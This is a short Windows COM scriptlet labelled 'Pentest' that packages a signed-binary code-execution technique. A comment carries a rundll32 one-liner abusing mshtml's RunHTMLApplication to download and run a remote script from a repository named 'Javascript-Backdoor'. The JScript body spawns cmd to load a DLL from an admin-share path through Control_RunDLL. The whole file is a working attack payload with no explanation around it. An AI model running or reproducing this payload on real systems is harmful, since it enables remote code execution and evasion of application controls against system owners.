<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Command -->
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") -->

<script language="JScript">
 
<![CDATA[   
var r = new ActiveXObject("WScript.Shell").Run("cmd /k rundll32 shell32.dll,Control_RunDLL \\127.0.0.1\C$\Windows\System32\wbem\wbemcomn.dll"); 
]]>
 
</script>
</registration>
</scriptlet>
